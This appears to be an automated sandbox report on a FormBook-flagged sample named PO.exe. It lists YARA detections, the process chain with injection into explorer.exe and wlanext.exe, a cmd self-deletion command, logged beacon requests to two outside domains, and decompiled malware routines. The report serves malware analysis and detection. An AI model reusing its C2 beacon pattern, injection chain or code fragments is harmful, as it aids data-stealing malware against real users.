                                                                                        Host: www.sidepiecebags.com
                                                                                        Connection: close
                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                        Data Ascii:
Apr 12, 2021 14:44:23.112587929 CEST | 6416 | IN | HTTP/1.1 301 Moved Permanently
                                                                                        Date: Mon, 12 Apr 2021 12:44:23 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        location: https://www.sidepiecebags.com/sawc?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43%2F2+iRXsYUADi
                                                                                        strict-transport-security: max-age=120
                                                                                        x-wix-request-id: 1618231463.06595580458311231
                                                                                        Age: 0
                                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                                        X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjiVMoGgJZPyIJpdYBUTBrV,qquldgcFrj2n046g4RNSVO38E53VHF73OUfaaLx5QS1YgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalkmuQylsJA3V7E3glv1YWYkVHNk5u2d09JBfuIudoiNFGgqFbFMYwiXnFojPwdof6Is93w6LXo3u2avFp3+sQqQ=,2UNV7KOq4oGjA5+PKsX47HMD3XjoxaKbTYcffYmebS0=,sqmudy1rWy5CXemzdhzS/DvShABuJSyPlI0TjoOmnGJNG+KuK+VIZfbNzHJu0vJu,WHOG0+z0OllpcvLoF6CtMKCiVg5TzCetmiVmxYEc1wjcxUjJ8rpSPv59B752oTh6hyBvImev6xi3GuPfdt7N/g==
                                                                                        Cache-Control: no-cache
                                                                                        Server: Pepyaka/1.19.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        4192.168.2.4497655.181.216.11280C:\Windows\explorer.exe
                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                        Apr 12, 2021 14:44:28.738830090 CEST | 6417 | OUT | GET /sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X HTTP/1.1
                                                                                        Host: www.mitraberdaya.com
                                                                                        Connection: close
                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        Apr 12, 2021 14:44:29.873827934 CEST | 6417 | IN | HTTP/1.1 301 Moved Permanently
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/7.4.16
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        X-Redirect-By: WordPress
                                                                                        Location: https://www.mitraberdaya.com/sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X
                                                                                        Content-Length: 0
                                                                                        Date: Mon, 12 Apr 2021 12:44:29 GMT
                                                                                        Server: LiteSpeed
                                                                                        Vary: User-Agent


                                                                                        System Behavior

                                                                                        General

                                                                                        Start time:14:42:24
                                                                                        Start date:12/04/2021
                                                                                        Path:C:\Users\user\Desktop\PO.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:'C:\Users\user\Desktop\PO.exe'
                                                                                        Imagebase:0x590000
                                                                                        File size:542208 bytes
                                                                                        MD5 hash:4BB710142C4FA183E24DBD3CE3C7B51D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low

                                                                                        General

                                                                                        Start time:14:43:07
                                                                                        Start date:12/04/2021
                                                                                        Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                        Imagebase:0xff0000
                                                                                        File size:42080 bytes
                                                                                        MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, Metadefender, Browse
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:14:43:13
                                                                                        Start date:12/04/2021
                                                                                        Path:C:\Windows\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:
                                                                                        Imagebase:0x7ff6fee60000
                                                                                        File size:3933184 bytes
                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:14:43:29
                                                                                        Start date:12/04/2021
                                                                                        Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                        Imagebase:0x2a0000
                                                                                        File size:78848 bytes
                                                                                        MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Author: Joe Security
                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:moderate

                                                                                        General

                                                                                        Start time:14:43:34
                                                                                        Start date:12/04/2021
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                        Imagebase:0x11d0000
                                                                                        File size:232960 bytes
                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        General

                                                                                        Start time:14:43:35
                                                                                        Start date:12/04/2021
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff724c50000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Disassembly

                                                                                        Code Analysis

                                                                                          Executed Functions

                                                                                          APIs
                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0280FDE4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.753142252.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CreateProcessUser
                                                                                          • String ID:
                                                                                          • API String ID: 2217836671-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #wRg^
                                                                                          • API String ID: 0-4133839354
                                                                                          • Opcode ID: 3e121224c9a0f960eacb89a639214f812cd18bdd43a6fac515c0e75b1856f9b4
                                                                                          • Instruction ID: b29fb874b9464a6a15c8710649aae51c5200971419e1de17b2ea86e76bee587a
                                                                                          • Opcode Fuzzy Hash: 3e121224c9a0f960eacb89a639214f812cd18bdd43a6fac515c0e75b1856f9b4
                                                                                          • Instruction Fuzzy Hash: AF32D374905228CFDB69DF64D845BEDBBB2FB49301F5084E9E40AA7394DB359A82CF10
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: 1b5a18cf5aea9dd3f3d86dade7e1ae0e065765267dc458249dcee361c2b48960
                                                                                          • Instruction ID: b0159eca19d44a3149757d084d3f29d0bde7c49140650b9c7248f71f81ad19ea
                                                                                          • Opcode Fuzzy Hash: 1b5a18cf5aea9dd3f3d86dade7e1ae0e065765267dc458249dcee361c2b48960
                                                                                          • Instruction Fuzzy Hash: AD41CAB4D042489FDB10CFA9C585BDEFFF0AB09314F20916AE428BB290DB749945CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bb8464e88fd1dd1cd425da77fccbc61f35b46a349222600ed2f7c84f8056d1ac
                                                                                          • Instruction ID: 8d3a0e4ef6fa099aa545622d5897db1dfb7f6ba9001da8e94c04e737b754ad11
                                                                                          • Opcode Fuzzy Hash: bb8464e88fd1dd1cd425da77fccbc61f35b46a349222600ed2f7c84f8056d1ac
                                                                                          • Instruction Fuzzy Hash: 27723C70A00219DFDB14DF65C988AAEBBF2FF88304F1584A9E516EB365DB34D942CB50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9ca53060635ab15a7ff97d308c01d128859e1954ff5c608e920e2bb22b037fb0
                                                                                          • Instruction ID: 4b305574d1bb1abf98ed0affb58173978a201b059caad0ccee32dd1b77ab256e
                                                                                          • Opcode Fuzzy Hash: 9ca53060635ab15a7ff97d308c01d128859e1954ff5c608e920e2bb22b037fb0
                                                                                          • Instruction Fuzzy Hash: 9C22C175A00228DFDB65CFA8C944F99BBB2FF48304F1580E9E509AB366DB319991DF10
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.753142252.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9N$9N
                                                                                          • API String ID: 0-1775532845
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: g
                                                                                          • API String ID: 0-30677878
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Executed Functions

                                                                                          C-Code - Quality: 23%
                                                                                          			E0041827A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                                          				void* _t20;
                                                                                          				void* _t29;
                                                                                          				intOrPtr* _t30;
                                                                                          				void* _t32;
                                                                                          
                                                                                          				asm("adc [ebp-0x74aa740a], esp");
                                                                                          				_t15 = _a4;
                                                                                          				_t30 = _a4 + 0xc48;
                                                                                          				E00418DD0(_t15, _t30,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
                                                                                          				_t4 =  &_a40; // 0x413a21
                                                                                          				_t6 =  &_a32; // 0x413d62
                                                                                          				_t12 =  &_a8; // 0x413d62
                                                                                          				_t20 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t29, _t32); // executed
                                                                                          				return _t20;
                                                                                          			}








                                                                                          APIs
                                                                                          • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID: !:A$b=A$b=A
                                                                                          • API String ID: 2738559852-704622139
                                                                                          • Opcode ID: 6905022bfff6c360c37e39531623e30200e0e308bf58be22cd1fb9589c6fc0b2
                                                                                          • Instruction ID: d149421ebbda5b49ee0c7619e7656ac0850391a34ea1661cc552ed47f2c0d52a
                                                                                          • Opcode Fuzzy Hash: 6905022bfff6c360c37e39531623e30200e0e308bf58be22cd1fb9589c6fc0b2
                                                                                          • Instruction Fuzzy Hash: 7DF0F9B2200108AFCB14CF89DC80DEB77A9FF8C354F158249FA0D97241D630E812CBA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 37%
                                                                                          			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                                          				void* _t18;
                                                                                          				intOrPtr* _t27;
                                                                                          
                                                                                          				_t13 = _a4;
                                                                                          				_t27 = _a4 + 0xc48;
                                                                                          				E00418DD0(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                          				_t4 =  &_a40; // 0x413a21
                                                                                          				_t6 =  &_a32; // 0x413d62
                                                                                          				_t12 =  &_a8; // 0x413d62
                                                                                          				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                                                          				return _t18;
                                                                                          			}






                                                                                          APIs
                                                                                          • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID: !:A$b=A$b=A
                                                                                          • API String ID: 2738559852-704622139
                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                          • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                          • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 79%
                                                                                          			E004181CA(void* __eax, void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                          				long _t26;
                                                                                          
                                                                                          				asm("rcl dword [ebp-0x75], 1");
                                                                                          				_t20 = _a4;
                                                                                          				_t5 = _t20 + 0xc40; // 0xc40
                                                                                          				E00418DD0(_a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                          				_t26 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                          				return _t26;
                                                                                          			}





                                                                                          APIs
                                                                                          • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 1f43cd1fcefbdc9c280a934e43d29ec9e508c14a71f5d03e481bae9432cef122
                                                                                          • Instruction ID: 1895565a246f6e9cfc1875b9e9f1c2c1632b3e6be1deeef945d9bb06d4a6d7e4
                                                                                          • Opcode Fuzzy Hash: 1f43cd1fcefbdc9c280a934e43d29ec9e508c14a71f5d03e481bae9432cef122
                                                                                          • Instruction Fuzzy Hash: B401A4B2204508AFCB18CF99DC95EEB77A9AF8C354F15825CFA1DD7281C630E851CBA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                          				long _t21;
                                                                                          
                                                                                          				_t3 = _a4 + 0xc40; // 0xc40
                                                                                          				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                          				return _t21;
                                                                                          			}





                                                                                          APIs
                                                                                          • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                          • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                          • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 68%
                                                                                          			E004183AA(void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                          				long _t14;
                                                                                          
                                                                                          				asm("cli");
                                                                                          				asm("aas");
                                                                                          				 *0x8b55bd73 =  *0x8b55bd73 + __edi;
                                                                                          				_t10 = _a4;
                                                                                          				_t3 = _t10 + 0xc60; // 0xca0
                                                                                          				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                          				return _t14;
                                                                                          			}





                                                                                          APIs
                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateMemoryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2167126740-0
